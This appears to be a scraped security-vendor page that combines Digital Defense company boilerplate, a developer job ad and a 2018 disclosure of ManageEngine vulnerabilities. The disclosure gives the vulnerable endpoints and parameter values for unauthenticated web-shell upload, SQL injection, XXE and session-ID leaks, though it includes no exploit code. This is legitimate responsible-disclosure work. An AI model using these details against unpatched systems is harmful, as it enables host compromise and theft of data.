Serving clients across numerous industries, from small businesses to very large enterprises, Digital Defense’s innovative and leading-edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. Frontline Vulnerability Manager™, the original Vulnerability Management as a Service (VMaaS) platform, delivers consistently accurate vulnerability scanning and penetration testing, while SecurED®, the company’s security awareness training, promotes employees’ security-minded behavior. The Digital Defense Frontline suite of products, underpinned by patented technology and complemented with unparalleled service and support, are highly-regarded by industry experts, as illustrated by the company’s designation as Best Scan Engine by Frost & Sullivan, top 20 ranking (#16) in Cybersecurity Ventures’ list of the World’s 500 Hottest Cybersecurity Companies, five-star review in SC Magazine, and inclusion in CRN’s MSP 500.

Software Developer

Careers

Digital Defense has an immediate opening for a Software Developer to work in our Research & Development DevOps team, helping to build out our next generation security technology platform. Candidates must have prior experience working on server-side code (preferably Python or Ruby) for web-applications, ideally using modern frameworks such as Django, Rails or NodeJS. The position will entail both developing new capabilities for our Frontline system, and helping to integrate our technology with other leading security solutions through their backend APIs.

Digital Defense is a profitable, privately held network security company with solid-growth, a great team-oriented culture and flexible work environment. We offer stock-options, 401k, health insurance and other standard benefits.

The candidate must live in or be willing to relocate to the San Antonio, TX, area.

Skills / Requirements:

Highly proficient in at least one major scripting language (Python, Ruby or Perl).

Experience building large webapps on Django, Rails or similar web frameworks which utilize ORM abstraction is a plus.

Experience working with the Linux operating system and at least one major Linux webserver (Apache, Nginx, Lighttpd)

Experience working with SQL databases such as Postgres or MySQL, query optimization, and relational database design fundamentals.

Experience working with high web application cache technologies such as MemCached or Redis is a plus.

Good understanding of web network protocols such as HTTP, JSON, XML-RPC, SSL and REST API interaction.

Experience with designing and writing unit-tests for your code is a plus.

Education & Experience

Bachelor’s degree in Computer Science or related technical field from an accredited university is preferable.

Personality:

Detail-oriented, with a passion for automation.

Must be capable of working both independently and as part of a dynamic team.

Desire the simple, elegant solution over the complex solution.

Other information:

All applicants must pass a credit and criminal background investigation prior to employment

ManageEngine

Blog

Update March 21, 2018: Added additional vulnerabilities disclosed to ManageEngine that were excluded from the original blog post affecting several additional ManageEngine applications.

Digital Defense is disclosing multiple vulnerabilities identified on various ManageEngine applications discovered by our Vulnerability Research Team (VRT). We commend ManageEngine for their prompt response to the identified flaws and their engineering team’s work with VRT to provide fixes for these security issues.

ManageEngine has provided patches for each of the vulnerabilities identified on the applications. The patched applications can be downloaded from ManageEngine’s website.

Clients who currently use Digital Defense’s Frontline Vulnerability Manager™ platform can sweep for the presence of these issues by performing a full vulnerability assessment scan or selecting CVC’s ManageEngine OpManager Multiple Vulnerabilities (123568) and

Details:

Impact: Remote code execution as SYSTEM, when running on Windows, full host compromise.

Application/Version Affected:

ServiceDesk Plus MSP 9.3 (Build 9302)

ServiceDesk Plus 9.3 (Build 9328)

Details: CmClientUtilServlet can be accessed without authentication. If the “command” request parameter is set to “addAttachmentInfo”, the “addAttachmentInfo” method will be called. This method doesn’t check if the “TYPE” request parameter contains a directory traversal sequence before using it in the path when creating a new file. The value of this parameter is also passed to “addAttachments” method of the com.adventnet.servicedesk.kbase.util.AttachmentUtil class which calls the “moveAttachments” method of AttachmentUtil. When the “moveAttachments” method is called, it will use the value of the “TYPE” request parameter in the destination path, which can be leveraged to write the uploaded file to a remotely accessible directory. Additionally, since none of these methods checked the file extension, this can be leveraged to upload a JSP web shell, that can be used to run commands as SYSTEM, fully compromising the host running the ServiceDeskPlus application.

Impact: Blind SQL injection can be leveraged to fully compromise the ManageEngine application and the host running the application.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The com.manageengine.opmanager.agent.servlets.RegisterAgent class passes the GET request parameters to the doRegister method of the com.manageengine.opmanager.agent.RegisterAgentImpl class. The doRegister method passes the monagentID parameter to the getAgentKeyForHostName method of the com.manageengine.opmanager.agent.utils.AgentDetailsUtil class. The getAgentKeyForHostName method inserts the user controlled value of monagentID directly into a SQL query without any sanitization.

Impact: Blind SQL injection can be leveraged to fully compromise the ManageEngine application and the host running the application.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The com.manageengine.opmanager.agent.servlets.StatusUpdateServlet class passes the GET parameters to the updateAgentStatus method of the com.manageengine.opmanager.agent.AgentStatusHandler class. This method passes the agentKey GET parameter to the getDeviceNameForAgentKey method of the com.manageengine.opmanager.agent.utils.AgentDetailsUtil class which uses it directly in a SQL query without any sanitization. The getDeviceNameForAgentKey method can also be exploited via the com.manageengine.opmanager.agent.servlets.AgentActionServlet class if the “operation” request parameter is set to triggerFileMonitoringAlert.

Vulnerability: User Enumeration via /servlets/ConfServlet

Impact: Username and information disclosure.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The ConfServlet class can be accessed via requests sent to /servlets/ConfServlet. If the DATA_REG query parameter is set to NOCUSER, the handleNocUserDetail method is called and will return a serialized Java HashMap containing local authentication user information, such as usernames, email addresses and phone numbers.

Impact: Blind SQL injection can be leveraged to fully compromise the ManageEngine application and the host running the application.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The com.manageengine.opmanager.servlet.EmbedAPIServlet class handles requests sent to /embedWidget and calls different classes and methods depending on the value of the methodCall HTTP request parameter. If the methodCall parameter is set to getBusinessViewDeviceList, EmbedAPIServlet will call the getBusinessViewDeviceList method of the com.adventnet.me.opmanager.server.api.handler.BusinessViewApiHandler class. This method then passes the value of the bvName request parameter to the getDeviceListByBV method of the APIDBUtil class where it’s used in a SQL query. If the methodCall parameter is set to getWidgetDeviceListForVendor, EmbedAPIServlet will call the getWidgetDeviceListForVendor method of the com.adventnet.me.opmanager.server.api.handler.DashboardApiHandler class. The getWidgetDeviceListForVendor method passes the value of the vendorid request parameter to the getWidgetDeviceListForVendor method of the APIDBUtil class where it’s used in a SQL query. If the methodCall parameter is set to GMapDetails, EmbedAPIServlet will call the GMapDetails method of the MapsApiHandler class. The GMapDetails method passes the value of the deviceType and deviceName request parameters to the getGMapObjects method of the APIDBUtil class where they’re used in a SQL query. No sanitization is performed on the vulnerable parameters before they’re used directly in a SQL query.

Details: The SNMPDiscoveryServlet accepts POST requests where the body is expected to be XML. The POST requests are handled by the doGet method which reads in the body of the POST request and attempts to parse it with the DocumentBuilderFactory class without first disabling doctypes. Not disallowing doctypes can allow an attacker to retrieve contents of files on the host running ManageEngine OpManager.

Impact: Blind SQL injection can be leveraged to fully compromise the ManageEngine application and the host running the application.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The com.adventnet.me.eventlog.ELARequestHandler servlet will call the getThemeForUser method when the “action” parameter is set to getTheme. The getThemeForUser method will then call the getThemeForUserName method of the OpManagerDBUtil class and pass it the value of the userName parameter from the GET request. The getThemeForUserName will then use the value of userName directly in a SQL query. The same path to getThemeForUserName is also available via /unauthenticatedservlets/NPMRequestHandler.

UPDATE:

Two additional vulnerabilities disclosed to ManageEngine in January were excluded from the blog post.

Impact: Sensitive information disclosure, including valid HTTP session IDs. This information can be used to fully compromise the web application.

Application/Version Affected:

Exchange Reporter Plus 5.2 (Build 5204)

AD360 4.1 (Build 4116)

Cloud Security Plus 4.0 (Build 4006)

Details: The access_log.txt file contains basic HTTP request information for requests sent to the web application, including the session ID. If a privileged user has logged into the application recently, this information could be used by an attacker to hijack the privileged user’s session and compromise the web application.

Impact: Arbitrary code execution as SYSTEM and full compromise of the host running Desktop Central. This can then be leveraged to compromise connected assets via the remote management functionality in Desktop Central.

Application/Version Affected:

Desktop Central 10 (Build 10.0.139)

Desktop Central MSP 10 (Build 10.0.147)

Patch Manager Plus 10 (Build 10.0.123)

Details: The FileUploadServlet can be accessed via a POST request to /fileupload. If the value of the “action” request parameter is set to “Registry_Upload” the remoteRegistryUpload method will be called to handle the upload of a zip file. The uploaded zip file is extracted to a predictable path that can be accessed without authentication and the contents of the zip file are not validated. This can be leveraged to upload a zip file containing a JSP web shell which can run commands with SYSTEM privileges.

ManageEngine is an innovative producer of enterprise IT management software, offering high-end functionality of large network management frameworks to enterprises worldwide. Currently, the company claims to have more than 40,000 customers worldwide, including three out of every five Fortune 500 company.

ManageEngine has addressed the vulnerabilities with patches available for each of the affected applications. Patches can be downloaded from the ManageEngine site. Digital Defense’s Frontline Vulnerability Manager™includes checks for the flaws. Details surrounding the disclosure can be accessed at the Digital Defense blog.

Mike Cotton, vice president of engineering at Digital Defense said, “Application layer vulnerabilities continue to be a key area of focus for software vendors. We are pleased to work collaboratively with affected vendors to facilitate prompt resolution, ensuring our clients and enterprises are protected from any potential exploitation of these vulnerabilities.”

Digital Defense Research Methodology and Practices

The Digital Defense VRT regularly works with organizations in the responsible disclosure of zero-day vulnerabilities. The expertise of the VRT, when coupled with the company’s next generation hybrid cloud platform, Frontline Vulnerability Manager, enables early detection capabilities. When zero-days are discovered and internally validated, the VRT immediately contacts the affected vendor to notify the organization of the new finding(s) and then assists, wherever possible, with the vendor’s remediation actions.

About Digital Defense

Serving clients across numerous industries, from small businesses to very large enterprises, Digital Defense’s innovative and leading edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. Frontline Vulnerability Manager™, the original Vulnerability Management as a Service (VMaaS) platform, delivers consistently accurate vulnerability scanning and penetration testing, while SecurED®, the company’s security awareness training, promotes employees’ security-minded behavior. The Digital Defense Frontline suite of products, underpinned by patented technology and complemented with unparalleled service and support, are highly-regarded by industry experts, as illustrated by the company’s designation as Best Scan Engine by Frost & Sullivan, top 20 ranking (#16) in Cybersecurity Ventures’ list of the World’s 500 Hottest Cybersecurity Companies, five-star review in SC Magazine, and inclusion in CRN’s MSP 500.